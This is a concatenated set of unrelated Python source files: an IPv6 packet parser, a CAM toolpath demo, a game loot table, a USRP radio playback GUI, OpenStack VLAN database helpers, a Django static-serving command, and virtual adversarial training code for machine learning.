self.extension_headers[-1].next_header_type = value else: raise RuntimeError("Can't set payload_type") else: self.next_header_type = value def parse (self, raw, offset=0): assert isinstance(raw, bytes) self.raw = raw if len(raw) < self.MIN_LEN: self.msg('warning IP packet data too short to parse header:' ' data len %u' % (len(raw),)) return (vtcfl, self.payload_length, nht, self.hop_limit) \ = struct.unpack('!IHBB', raw[offset:offset+8]) self.srcip = IPAddr6(raw[offset+8:offset+24], raw=True) self.dstip = IPAddr6(raw[offset+24:offset+40], raw=True) self.next_header_type = nht offset += 40 self.v = vtcfl >> 28 self.tc = (vtcfl >> 20) & 0xff self.flow = vtcfl & 0xfffff if self.v != 6: self.msg('ip parse) warning IP version %u not IPv6' % self.v) return length = self.payload_length if length > len(raw): length = len(raw) # Clamp to what we've got self.msg('(ipv6) warning IP packet data incomplete (%s of %s)' % (len(raw), self.payload_length)) while nht != ipv6.NO_NEXT_HEADER: c = _extension_headers.get(nht) if c: if length < 8: self.msg('(ipv6) warning, packet data incomplete') return try: offset,o = c.unpack_new(raw, offset, max_length = length) length -= len(o) except TruncatedException: self.msg('(ipv6) warning, packet data truncated') return self.extension_headers.append(o) nht = o.next_header_type else: break self.parsed = True #TODO: This should be done a better way (and shared with IPv4?). if nht == self.UDP_PROTOCOL: self.next = udp(raw=raw[offset:offset+length], prev=self) elif nht == self.TCP_PROTOCOL: self.next = tcp(raw=raw[offset:offset+length], prev=self) elif nht == self.ICMP6_PROTOCOL: self.next = icmpv6(raw=raw[offset:offset+length], prev=self) # elif nht == self.IGMP_PROTOCOL: # self.next = igmp(raw=raw[offset:offset+length], prev=self) elif nht == self.NO_NEXT_HEADER: self.next = None else: self.next = raw[offset:offset+length] if isinstance(self.next, packet_base) and not self.next.parsed: self.next = raw[offset:offset+length] def add_header (self, eh): if self.extension_headers: assert isinstance(self.extension_headers[-1], ExtensionHeader) self.extension_headers[-1].next_header_type = eh.TYPE else: self._next_header_type = eh.TYPE def hdr (self, payload): vtcfl = self.v << 28 vtcfl |= (self.flow & 0xfffff) vtcfl |= (self.tc & 0xff) << 20 if self.next_header_type is None: if self.extension_headers: nht = self.extension_headers[0].TYPE else: #TODO: We should infer this? assert False, "Must set next header type" else: nht = self.next_header_type self.next_header_type = nht #FIXME: this is a hack # Ugh, this is also an ugly hack if hasattr(payload, 'pack'): self.payload_length = len(payload.pack()) else: self.payload_length = len(payload) r = struct.pack("!IHBB", vtcfl, self.payload_length, nht, self.hop_limit) r += self.srcip.raw r += self.dstip.raw return r def _to_str (self): ehs = [ipproto_to_str(self.next_header_type)] for eh in self.extension_headers: ehs.append(ipproto_to_str(eh.next_header_type)) s = "IPv6 %s>%s" % (self.srcip, self.dstip) return "[" + s + " " + "+".join(ehs) + "]" #def __str__ (self): # s = "[IP%s+%s %s>%s (hl:%s)]" % ( # self.v, # ipproto_to_str(self.next_header_type), # self.srcip, self.dstip, self.hop_limit) # return s
import ocl import camvtk import time import vtk if __name__ == "__main__": print ocl.revision() myscreen = camvtk.VTKScreen() stl = camvtk.STLSurf("../stl/demo.stl") print "STL surface read" myscreen.addActor(stl) stl.SetWireframe() polydata = stl.src.GetOutput() s= ocl.STLSurf() camvtk.vtkPolyData2OCLSTL(polydata, s) print "STLSurf with ", s.size(), " triangles" # define a cutter #cutter = ocl.CylCutter(0.6, 5) cutter = ocl.BullCutter(0.6, 0.01, 5) print cutter pdc = ocl.PathDropCutter() # create a pdc apdc = ocl.AdaptivePathDropCutter() pdc.setSTL(s) apdc.setSTL(s) pdc.setCutter(cutter) # set the cutter apdc.setCutter(cutter) #print "set minimumZ" #pdc.minimumZ = -1 # set the minimum Z-coordinate, or "floor" for drop-cutter #apdc.minimumZ = -1 #print "set the sampling interval" pdc.setSampling(0.4) apdc.setSampling(0.4) apdc.setMinSampling(0.0008) print " apdc sampling = ", apdc.getSampling() # some parameters for this "zigzig" pattern ymin=0 ymax=12 Ny=10 # number of lines in the y-direction dy = float(ymax-ymin)/Ny # the y step-over path = ocl.Path() # create an empty path object path2 = ocl.Path() # add Line objects to the path in this loop for n in xrange(0,Ny): y = ymin+n*dy p1 = ocl.Point(0,y,0) # start-point of line p2 = ocl.Point(10,y,0) # end-point of line l = ocl.Line(p1,p2) # line-object l2 = ocl.Line(p1,p2) path.append( l ) # add the line to the path path2.append( l2 ) print " set the path for pdf " pdc.setPath( path ) apdc.setPath( path2 ) print " run the calculation " t_before = time.time() pdc.run() # run drop-cutter on the path t_after = time.time() print " pdc run took ", t_after-t_before," s" print " run the calculation " t_before = time.time() apdc.run() # run drop-cutter on the path t_after = time.time() print " apdc run took ", t_after-t_before," s" print "get the results " clp = pdc.getCLPoints() # get the cl-points from pdf aclp = apdc.getCLPoints() print "got ", len(aclp) ," adaptive points" aclp_lifted=[] for p in aclp: p2 = ocl.Point(p.x,p.y,p.z) + ocl.Point(0,0,1) aclp_lifted.append(p2) # filter the adaptively sampled toolpaths print "filtering. before filter we have", len(aclp_lifted),"cl-points" t_before = time.time() f = ocl.LineCLFilter() f.setTolerance(0.001) for p in aclp_lifted: p2 = ocl.CLPoint(p.x,p.y,p.z) f.addCLPoint(p2) f.run() t_after = time.time() calctime = t_after-t_before print " done in ", calctime," s" cl_filtered = f.getCLPoints() aclp_lifted2=[] for p in cl_filtered: p2 = ocl.Point(p.x,p.y,p.z) + ocl.Point(0,0,1) aclp_lifted2.append(p2) print " render the CL-points" camvtk.drawCLPointCloud(myscreen, clp) camvtk.drawCLPointCloud(myscreen, aclp_lifted) camvtk.drawCLPointCloud(myscreen, aclp_lifted2) #myscreen.addActor( camvtk.PointCloud(pointlist=clp, collist=ccp) ) myscreen.camera.SetPosition(3, 23, 15) myscreen.camera.SetFocalPoint(5, 5, 0) myscreen.render() print " All done." myscreen.iren.Start()
def itemNames(): items = ['animal_hide_rack_style_1','animal_hide_rack_style_2','animal_hide_rack_style_3','animal_hide_rack_style_4'] items +=['at_st_pilots_helmet','aurilian_sculpture_section_1','aurilian_sculpture_section_2','aurilian_sculpture_section_3'] items +=['aurilian_sculpture_section_4','banes_heart','bar_corner_piece_1','bar_corner_piece_2'] items +=['bar_corner_piece_3','bar_counter_large','bothan_beauty','bothan_buff'] items +=['cast_wing_in_flight','corellian_seaside','data_disk_hologram','decorative_bubble_tank'] items +=['droid_in_contrast','drum','emperors_eyes','family_bonds'] items +=['feared','fighter_study','fighters_courage','geonosian_costume_instructions'] items +=['hanging_life_day_orb','hutt_greed','imperial_oppression','jedi_statue_schematic'] items +=['jubilee_wheel_schematic','kachirho_wall_cornucopia','kowakian_cage','krayt_costume_instructions'] items +=['large_fruit_stand_schematic','large_unmarked_crate','lava_geode','life_day_lamp'] items +=['life_day_proud_wookie','life_day_red_robed_wookie','living_canals','lugjack_machine_schematic'] items +=['miniature_wroshyr_tree','modified_fusion_reactor_schematic','mustafarian_injector','mynock_costume_instructions'] items +=['no_division','nym_collectible_globe','pilgrimage','poster_of_a_ship_schematic'] items +=['poster_of_a_turret_schematic','poster_of_food_preparation','proton_chair','rancor_costume_instructions'] items +=['rotj_helmet','shard_of_the_serpent','stap1_vehicle_deed','target_dummy_black_sun'] items +=['target_dummy_rebel','target_dummy_stormtrooper','tatooine_dune_speeder','triumph'] items +=['ugnaught_costume_instructions','victory','wampa_costume_instructions','war_terminal'] items +=['warriors honor','wookie_home_banner_kit','wookie_life_day_orb','xeno_couch'] items +=['xeno_desk','xeno_desk_lamp','xeno_rug','xeno_table'] items += ['powercrystal_perfect'] return items def itemChances(): chances=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298] return chances ##Sum must be exactly 100 77 items -> 1.298
#!/usr/bin/env python # Copyright (C) 2006, 2007, 2008, 2009,-2010 Her Majesty the Queen in # Right of Canada (Communications Research Center Canada) # This file is part of ODR-DabMod. # # ODR-DabMod is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # ODR-DabMod is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with ODR-DabMod. If not, see <http://www.gnu.org/licenses/>. from wxPython.wx import * from optparse import OptionParser from gnuradio import gr from gnuradio import usrp from gnuradio.wxgui import fftsink, scopesink from gnuradio.eng_notation import num_to_str from gnuradio.eng_option import * ID_ABOUT = wxNewId() ID_EXIT = wxNewId() ID_GAIN_SLIDER0 = wxNewId() ID_FREQ_SLIDER0 = wxNewId() ID_GAIN_SLIDER1 = wxNewId() ID_FREQ_SLIDER1 = wxNewId() ID_START = wxNewId() ID_STOP = wxNewId() def gcd(a, b) : if b == 0 : return a return gcd(b, a % b) def appendFrequency(option, opt, value, parser): if parser.values.frequency is None : parser.values.frequency = [ value ] else : parser.values.frequency.append(value) def listUsrp(option, opt, value, parser): id = 0 while (true) : try: version = usrp._look_for_usrp(id) print "USRP #%i" % id print " Rev: %i" % version dst = usrp.sink_c(id) src = usrp.source_c(id) print " Tx" for db in dst.db: if (db[0].dbid() != -1): print " %s" % db[0].side_and_name() (min, max, offset) = db[0].freq_range() print " Frequency" print " Min: %sHz" % num_to_str(min) print " Max: %sHz" % num_to_str(max) print " Offset: %sHz" % num_to_str(offset) (min, max, offset) = db[0].gain_range() print " Gain" print " Min: %sdB" % num_to_str(min) print " Max: %sdB" % num_to_str(max) print " Offset: %sdB" % num_to_str(offset) print " Rx" for db in src.db: if (db[0].dbid() != -1): print " %s" % db[0].side_and_name() (min, max, offset) = db[0].freq_range() print " Frequency" print " Min: %sHz" % num_to_str(min) print " Max: %sHz" % num_to_str(max) print " Offset: %sHz" % num_to_str(offset) (min, max, offset) = db[0].gain_range() print " Gain" print " Min: %sdB" % num_to_str(min) print " Max: %sdB" % num_to_str(max) print " Offset: %sdB" % num_to_str(offset) except RuntimeError: break id += 1 raise SystemExit class MyFrame(wxFrame): def __init__(self, parent, ID, title): wxFrame.__init__(self, parent, ID, title, wxDefaultPosition) self.pga = 0 self.pgaMin = -20 self.pgaMax = 0 self.pgaStep = 0.25 # Parsing options parser = OptionParser(option_class=eng_option, usage="usage: %prog [options] filename1" \ " [-f frequency2 filename2 [...]]") parser.add_option("-a", "--agc", action="store_true", help="enable agc") parser.add_option("-c", "--clockrate", type="eng_float", default=128e6, help="set USRP clock rate (128e6)") parser.add_option("--copy", action="store_true", help="enable real to imag data copy when in real mode") parser.add_option("-e", "--encoding", type="choice", choices=["s", "f"], default="f", help="choose data encoding: [s]igned or [f]loat.") parser.add_option("-f", "--frequency", type="eng_float", action="callback", callback=appendFrequency, help="set output frequency (222.064e6)") parser.add_option("-g", "--gain", type="float", help="set output pga gain") parser.add_option("-l", "--list", action="callback", callback=listUsrp, help="list USRPs and daugtherboards") parser.add_option("-m", "--mode", type="eng_float", default=2, help="mode: 1: real, 2: complex (2)") parser.add_option("-o", "--osc", action="store_true", help="enable oscilloscope") parser.add_option("-r", "--samplingrate", type="eng_float", default=3.2e6, help="set input sampling rate (3200000)") parser.add_option("-s", "--spectrum", action="store_true", help="enable spectrum analyzer") # parser.add_option("-t", "--tx", type="choice", choices=["A", "B"], # default="A", help="choose USRP tx A|B output (A)") parser.add_option("-u", "--usrp", action="store_true", help="enable USRP output") (options, args) = parser.parse_args() if len(args) == 0 : options.filename = [ "/dev/stdin" ] else : options.filename = args # Setting default frequency if options.frequency is None : options.frequency = [ 222.064e6 ] if len(options.filename) != len(options.frequency) : parser.error("Nb input file != nb frequency!") # Status bar # self.CreateStatusBar(3, 0) # msg = "PGA: %.2f dB" % (self.pga * self.pgaStep) # self.SetStatusText(msg, 1) # msg = "Freq: %.3f mHz" % (options.frequency[0] / 1000000.0) # self.SetStatusText(msg, 2) # Menu bar menu = wxMenu() menu.Append(ID_ABOUT, "&About", "More information about this program") menu.AppendSeparator() menu.Append(ID_EXIT, "E&xit", "Terminate the program") menuBar = wxMenuBar() menuBar.Append(menu, "&File") self.SetMenuBar(menuBar) # Main windows mainSizer = wxFlexGridSizer(0, 1) sliderSizer = wxFlexGridSizer(0, 2) buttonSizer = wxBoxSizer(wxHORIZONTAL) if options.usrp : # TX d'board 0 gainLabel = wxStaticText(self, -1, "PGA 0") gainSlider = wxSlider(self, ID_GAIN_SLIDER0, self.pga, self.pgaMin / self.pgaStep, self.pgaMax / self.pgaStep, style = wxSL_HORIZONTAL | wxSL_AUTOTICKS) gainSlider.SetSize((400, -1)) sliderSizer.Add(gainLabel, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) sliderSizer.Add(gainSlider, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) freqLabel = wxStaticText(self, -1, "Frequency 0") freqSlider = wxSlider(self, ID_FREQ_SLIDER0, options.frequency[0] / 16000, 0, 20e3, style = wxSL_HORIZONTAL | wxSL_AUTOTICKS) freqSlider.SetSize((400, -1)) sliderSizer.Add(freqLabel, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) sliderSizer.Add(freqSlider, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) if len(options.frequency) > 1 : # TX d'board 1 gainLabel = wxStaticText(self, -1, "PGA 1") gainSlider = wxSlider(self, ID_GAIN_SLIDER1, self.pga, self.pgaMin / self.pgaStep, self.pgaMax / self.pgaStep, style = wxSL_HORIZONTAL | wxSL_AUTOTICKS) gainSlider.SetSize((400, -1)) sliderSizer.Add(gainLabel, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) sliderSizer.Add(gainSlider, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) freqLabel = wxStaticText(self, -1, "Frequency 1") freqSlider = wxSlider(self, ID_FREQ_SLIDER1, options.frequency[1] / 16000, 0, 20e3, style = wxSL_HORIZONTAL | wxSL_AUTOTICKS) freqSlider.SetSize((400, -1)) sliderSizer.Add(freqLabel, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) sliderSizer.Add(freqSlider, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) mainSizer.Add(sliderSizer, 1, wxEXPAND, 0) start = wxButton(self, ID_START, "Start") stop = wxButton(self, ID_STOP, "Stop") buttonSizer.Add(start, 1, wxALIGN_CENTER, 0) buttonSizer.Add(stop, 1, wxALIGN_CENTER, 0) mainSizer.Add(buttonSizer, 1, wxEXPAND, 0) # GnuRadio self.fg = gr.flow_graph() if options.mode == 1 : print "Source: real" if (options.encoding == "s") : print "Source encoding: short" src = gr.file_source(gr.sizeof_short, options.filename[0], 1) if (options.copy) : print "Imag: copy" imag = src else : print "Imag: null" imag = gr.null_source(gr.sizeof_short) interleaver = gr.interleave(gr.sizeof_short) self.fg.connect(src, (interleaver, 0)) self.fg.connect(imag, (interleaver, 1)) tail = interleaver elif (options.encoding == "f") : print "Source encoding: float" src = gr.file_source(gr.sizeof_gr_complex, options.filename[0], 1) tail = src elif (options.mode == 2) : print "Source: complex" if len(options.frequency) == 1 : if (options.encoding == "s") : print "Source encoding: short" src = gr.file_source(gr.sizeof_short, options.filename[0], 1) elif (options.encoding == "f") : print "Source encoding: float" src = gr.file_source(gr.sizeof_gr_complex, options.filename[0], 1) else : parser.error("Invalid encoding type for complex data!") tail = src elif (len(options.frequency) == 2) : src0 = gr.file_source(gr.sizeof_gr_complex, options.filename[0], 1) src1 = gr.file_source(gr.sizeof_gr_complex, options.filename[1], 1) interleaver = gr.interleave(gr.sizeof_gr_complex) self.fg.connect(src0, (interleaver, 0)) self.fg.connect(src1, (interleaver, 1)) tail = interleaver else : parser.error( "Invalid number of source (> 2) with complex input!") else : parser.error("Invalid mode!") # Interpolation dac_freq = options.clockrate interp = int(dac_freq / options.samplingrate) if interp == 0 : parser.error("Invalid sampling rate!") if options.mode == 2 : print "Input sampling rate: %s complex samples/s" % \ num_to_str(options.samplingrate) else : print "Input sampling rate: %s samples/s" % \ num_to_str(options.samplingrate) print "Interpolation rate: int(%s / %s) = %sx" % \ (num_to_str(dac_freq), num_to_str(options.samplingrate), interp) if interp > 512 : factor = gcd(dac_freq / 512, options.samplingrate) num = int((dac_freq / 512) / factor) den = int(options.samplingrate / factor) print "Resampling by %i / %i" % (num, den) resampler = blks.rational_resampler_ccc(self.fg, num, den) self.fg.connect(tail, resampler) tail = resampler interp = 512 options.samplingrate = dac_freq / 512 # AGC if options.agc : agc = gr.agc_cc() self.fg.connect(tail, agc) tail = agc # USRP if options.usrp : nchan = len(options.frequency) if len(options.frequency) == 1 : if options.mode == 1 : mux = 0x00000098 elif options.mode == 2 : mux = 0x00000098 else : parser.error("Unsupported mode for USRP mux!") elif len(options.frequency) == 2 : if options.mode == 1 : mux = 0x0000ba98 elif options.mode == 2 : mux = 0x0000ba98 else : parser.error("Unsupported mode for USRP mux!") else : parser.error("Invalid number of frequency [0..2]!") # if options.tx == "A" : # mux = 0x00000098 # else : # mux = 0x00009800 print "Nb channels: ", nchan print "Mux: 0x%x" % mux if options.encoding == 's' : dst = usrp.sink_s(0, interp, nchan, mux) elif options.encoding == 'f' : dst = usrp.sink_c(0, interp, nchan, mux) else : parser.error("Unsupported data encoding for USRP!") dst.set_verbose(1) for i in range(len(options.frequency)) : if options.gain is None : print "Setting gain to %f" % dst.pga_max() dst.set_pga(i << 1, dst.pga_max()) else : print "Setting gain to %f" % options.gain dst.set_pga(i << 1, options.gain) tune = false for dboard in dst.db: if (dboard[0].dbid() != -1): device = dboard[0] print "Tuning TX d'board %s to %sHz" % \ (device.side_and_name(), num_to_str(options.frequency[i])) device.lo_offset = 38e6 (min, max, offset) = device.freq_range() print " Frequency" print " Min: %sHz" % num_to_str(min) print " Max: %sHz" % num_to_str(max) print " Offset: %sHz" % num_to_str(offset) #device.set_gain(device.gain_range()[1]) device.set_enable(True) tune = \ dst.tune(device._which, device, options.frequency[i] * 128e6 / dac_freq) if tune: print " Baseband frequency: %sHz" % \ num_to_str(tune.baseband_freq) print " DXC frequency: %sHz" % \ num_to_str(tune.dxc_freq) print " Residual Freqency: %sHz" % \ num_to_str(tune.residual_freq) print " Inverted: ", \ tune.inverted mux = usrp.determine_tx_mux_value(dst, (device._which, 0)) dst.set_mux(mux) break else: print " Failed!" if not tune: print " Failed!" raise SystemExit # int nunderruns () print "USRP" print " Rx halfband: ", dst.has_rx_halfband() print " Tx halfband: ", dst.has_tx_halfband() print " Nb DDC: ", dst.nddc() print " Nb DUC: ", dst.nduc() #dst._write_9862(0, 14, 224) print " DAC frequency: %s samples/s" % num_to_str(dst.dac_freq()) print " Fpga decimation rate: %s -> %s samples/s" % \ (num_to_str(dst.interp_rate()), num_to_str(dac_freq / dst.interp_rate())) print " Nb channels:", if hasattr(dst, "nchannels()") : print dst.nchannels() else: print "N/A" print " Mux:", if hasattr(dst, "mux()") : print "0x%x" % dst.mux() else : print "N/A" print " FPGA master clock frequency:", if hasattr(dst, "fpga_master_clock_freq()") : print "%sHz" % num_to_str(dst.fpga_master_clock_freq()) else : print "N/A" print " Converter rate:", if hasattr(dst, "converter_rate()") : print "%s" % num_to_str(dst.converter_rate()) else : print "N/A" print " DAC rate:", if hasattr(dst, "dac_rate()") : print "%s sample/s" % num_to_str(dst.dac_rate()) else : print "N/A" print " Interp rate: %sx" % num_to_str(dst.interp_rate()) print " DUC frequency 0: %sHz" % num_to_str(dst.tx_freq(0)) print " DUC frequency 1: %sHz" % num_to_str(dst.tx_freq(1)) print " Programmable Gain Amplifier 0: %s dB" % \ num_to_str(dst.pga(0)) print " Programmable Gain Amplifier 1: %s dB" % \ num_to_str(dst.pga(2)) else : dst = gr.null_sink(gr.sizeof_gr_complex) # AGC if options.agc : agc = gr.agc_cc() self.fg.connect(tail, agc) tail = agc self.fg.connect(tail, dst) # oscilloscope if options.osc : oscPanel = wxPanel(self, -1) if (options.encoding == "s") : converter = gr.interleaved_short_to_complex() self.fg.connect(tail, converter) signal = converter elif (options.encoding == "f") : signal = tail else : parser.error("Unsupported data encoding for oscilloscope!") #block = scope_sink_f(fg, parent, title=label, sample_rate=input_rate) #return (block, block.win) oscWin = scopesink.scope_sink_c(self.fg, oscPanel, "Signal", options.samplingrate) self.fg.connect(signal, oscWin) mainSizer.Add(oscPanel, 1, wxEXPAND) # spectrometer if options.spectrum : ymin = 0 ymax = 160 fftPanel = wxPanel(self, -1) if (options.encoding == "s") : converter = gr.interleaved_short_to_complex() self.fg.connect(tail, converter) signal = converter elif (options.encoding == "f") : signal = tail else : parser.error("Unsupported data encoding for oscilloscope!") fftWin = fftsink.fft_sink_c(self.fg, fftPanel, title="Spectrum", fft_size=2048, sample_rate=options.samplingrate, y_per_div=(ymax - ymin) / 8, ref_level=ymax, fft_rate=50, average=True ) self.fg.connect(signal, fftWin) mainSizer.Add(fftPanel, 1, wxEXPAND) # Events EVT_MENU(self, ID_ABOUT, self.OnAbout) EVT_MENU(self, ID_EXIT, self.TimeToQuit) EVT_SLIDER(self, ID_GAIN_SLIDER0, self.slideEvent) EVT_SLIDER(self, ID_FREQ_SLIDER0, self.slideEvent) EVT_SLIDER(self, ID_GAIN_SLIDER1, self.slideEvent) EVT_SLIDER(self, ID_FREQ_SLIDER1, self.slideEvent) EVT_BUTTON(self, ID_START, self.onClick) EVT_BUTTON(self, ID_STOP, self.onClick) #Layout sizers self.SetSizer(mainSizer) self.SetAutoLayout(1) mainSizer.Fit(self) self.fg.start() def OnAbout(self, event): dlg = wxMessageDialog(self, "This sample program shows off\n" "frames, menus, statusbars, and this\n" "message dialog.", "About Me", wxOK | wxICON_INFORMATION) dlg.ShowModal() dlg.Destroy() def TimeToQuit(self, event): self.Close(true) def slideEvent(self, evt): value = evt.GetInt() id = evt.GetId() if id == ID_GAIN_SLIDER: msg = "PGA: %.2f dB" % (value * self.pgaStep) self.SetStatusText(msg, 1) elif id == ID_FREQ_SLIDER: msg = "Freq: %.3f mHz" % (value * 16.0 / 1000) self.SetStatusText(msg, 2) else: print "Slider event not yet coded!" self.Close(True) def onClick(self, event): id = event.GetId() if id == ID_START: self.fg.start() elif id == ID_STOP: self.fg.stop() else: print "Click event not yet coded!" self.Close(True) class MyApp(wxApp): def OnInit(self): frame = MyFrame(NULL, -1, "Digital WAve Player") frame.Show(true) self.SetTopWindow(frame) return true app = MyApp(0) app.MainLoop()
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2011 Nicira Networks, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # @author: Somik Behera, Nicira Networks, Inc. # @author: Brad Hall, Nicira Networks, Inc. # @author: Dan Wendlandt, Nicira Networks, Inc. from sqlalchemy.orm import exc import quantum.db.api as db import quantum.db.models as models import ovs_models def get_vlans(): session = db.get_session() try: bindings = session.query(ovs_models.VlanBinding).\ all() except exc.NoResultFound: return [] res = [] for x in bindings: res.append((x.vlan_id, x.network_id)) return res def add_vlan_binding(vlanid, netid): session = db.get_session() binding = ovs_models.VlanBinding(vlanid, netid) session.add(binding) session.flush() return binding.vlan_id def remove_vlan_binding(netid): session = db.get_session() try: binding = session.query(ovs_models.VlanBinding).\ filter_by(network_id=netid).\ one() session.delete(binding) except exc.NoResultFound: pass session.flush()
from optparse import make_option from django.conf import settings from django.core.management.commands.runserver import BaseRunserverCommand from django.contrib.staticfiles.handlers import StaticFilesHandler class Command(BaseRunserverCommand): option_list = BaseRunserverCommand.option_list + ( make_option('--nostatic', action="store_false", dest='use_static_handler', default=True, help='Tells Django to NOT automatically serve static files at STATICFILES_URL.'), make_option('--insecure', action="store_true", dest='insecure_serving', default=False, help='Allows serving static files even if DEBUG is False.'), ) help = "Starts a lightweight Web server for development, including static files serving." def get_handler(self, *args, **options): """ Returns the static files serving handler. """ handler = super(Command, self).get_handler(*args, **options) use_static_handler = options.get('use_static_handler', True) insecure_serving = options.get('insecure_serving', False) if (settings.DEBUG and use_static_handler or (use_static_handler and insecure_serving)): handler = StaticFilesHandler(handler) return handler
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Functions used for Virtual Adversarial Training on sparse feature matrices.""" from .adversarial_dense import get_normalized_vector from .adversarial_dense import get_normalizing_constant import tensorflow as tf epsilon = 5 num_power_iterations = 1 xi = 1e-6 scale_r = False def kl_divergence_with_logit(q_logit, p_logit, mask): """Computes KL-divergence between to sets of logits for the masked samples.""" q = tf.nn.softmax(q_logit) num_non_zero = tf.reduce_sum(mask) qlogq = -tf.nn.softmax_cross_entropy_with_logits_v2(labels=q, logits=q_logit) qlogq = qlogq * mask / num_non_zero qlogp = -tf.nn.softmax_cross_entropy_with_logits_v2(labels=q, logits=p_logit) qlogp = qlogp * mask / num_non_zero return qlogq - qlogp def get_loss_vat(inputs, predictions, mask, is_train, model, placeholders, predictions_var_scope): """Computes the virtual adversarial loss for the provided inputs. Args: inputs: A batch of input features, where the batch is the first dimension. predictions: The logits predicted by a model on the provided inputs. mask: A tensor of booleans specifying which samples to apply the virtual adversarial loss to. is_train: A boolean placeholder specifying if this is a training or testing setting. model: The model that generated the logits. placeholders: Placeholders for model encodings. predictions_var_scope: Variable scope for obtaining the predictions. Returns: A float value representing the virtual adversarial loss. """ mask = tf.cast(mask, dtype=tf.float32) r_vadv = generate_virtual_adversarial_perturbation( inputs, predictions, model, placeholders, mask, predictions_var_scope, is_train=is_train) predictions = tf.stop_gradient(predictions) logit_p = predictions new_inputs = tf.sparse_add(inputs, r_vadv) with tf.variable_scope( predictions_var_scope, auxiliary_name_scope=False, reuse=True): encoding_m, _, _ = model.get_encoding_and_params( inputs=new_inputs, is_train=is_train, update_batch_stats=False, **placeholders) logit_m, _, _ = model.get_predictions_and_params( encoding=encoding_m, is_train=is_train, **placeholders) num_non_zero = tf.reduce_sum(mask) loss = kl_divergence_with_logit(logit_p, logit_m, mask) return tf.reduce_sum(loss) / num_non_zero def generate_virtual_adversarial_perturbation(inputs, logits, model, placeholders, mask, predictions_var_scope, is_train=True): """Generates an adversarial perturbation for virtual adversarial training. Args: inputs: A batch of input features, where the batch is the first dimension. logits: The logits predicted by a model on the provided inputs. model: The model that generated the logits. placeholders: A dictionary mapping string names to Tensorflow placeholders that are passed to the models when generating the predictions. mask: A tensor of booleans specifying which samples to apply the virtual adversarial loss to. predictions_var_scope: Variable scope for obtaining the predictions. is_train: A boolean placeholder specifying if this is a training or testing setting. Returns: A Tensor of the same shape as the inputs containing the adversarial perturbation for these inputs. """ # Generate random perturbations. d = tf.random_normal(shape=tf.shape(inputs)) # Only apply perturbations on the masked samples. d = tf.multiply(d, mask[:, None]) for _ in range(num_power_iterations): d = xi * get_normalized_vector(d) logit_p = logits new_inputs = tf.add(tf.sparse_tensor_to_dense(inputs), d) new_inputs = tf.sparse.from_dense(new_inputs) with tf.variable_scope( predictions_var_scope, auxiliary_name_scope=False, reuse=True): encoding_m, _, _ = model.get_encoding_and_params( inputs=new_inputs, is_train=is_train, update_batch_stats=False, **placeholders) logit_m, _, _ = model.get_predictions_and_params( encoding=encoding_m, is_train=is_train, **placeholders) dist = kl_divergence_with_logit(logit_p, logit_m, mask) grad = tf.gradients(dist, [d], aggregation_method=2)[0] d = tf.stop_gradient(grad) r_vadv = get_normalized_vector(d) if scale_r: r_vadv *= get_normalizing_constant(inputs.values) r_vadv *= epsilon return tf.sparse.from_dense(r_vadv) def logsoftmax(x): """Softmax where the inputs are logits and the outputs remain logits.""" xdev = x - tf.reduce_max(x, 1, keep_dims=True) lsm = xdev - tf.log(tf.reduce_sum(tf.exp(xdev), 1, keep_dims=True)) return lsm def entropy_y_x(logits, mask): """Entropy term to add to VAT with entropy minimization. Args: logits: A Tensor containing the predicted logits for a batch of samples. mask: A boolean Tensor specifying which samples to use in the calculation of the entropy. Returns: The entropy minimization loss. """ mask = tf.cast(mask, dtype=tf.float32) p = tf.nn.softmax(logits) ent = tf.reduce_sum(p * logsoftmax(logits), 1) ent = tf.reduce_sum(tf.multiply(ent, mask)) / tf.reduce_sum(mask) return -ent
